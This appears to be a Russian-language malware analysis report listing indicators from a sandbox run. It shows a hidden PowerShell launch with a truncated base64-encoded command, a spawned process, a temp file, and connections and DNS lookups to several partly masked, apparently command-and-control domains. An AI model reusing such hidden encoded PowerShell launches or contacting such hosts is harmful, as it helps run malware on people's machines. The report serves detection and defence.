Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABLAHMAdgBzAGIAbwB6AGgAaAA9ACcAWgBvAGcAZQBqAGUAdQBqAHcAdAAnADsAJABYAGEAZgByAHEAZwB5AHAAIAA9ACAAJwA0ADEAOQAnADsAJABIAGMAeABlAHoAbwBwAGcAbQBzAGYAPQAnAFEAegByAGY...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1476
- %TEMP%\923728.cvr
- 'es##ad.us':443
- 'mi###ightbd.com':443
- 'ag####andrakm.com':443
- 'sv#####boratorier.com':443
- 'x1.#.lencr.org':80
- 'pl######me.chancegal.com':443
- http://x1.#.lencr.org/
- 'es##ad.us':443
- 'ag####andrakm.com':443
- 'sv#####boratorier.com':443
- 'pl######me.chancegal.com':443
- DNS ASK es##ad.us
- DNS ASK mi###ightbd.com
- DNS ASK ag####andrakm.com
- DNS ASK sv#####boratorier.com
- DNS ASK x1.#.lencr.org
- DNS ASK pl######me.chancegal.com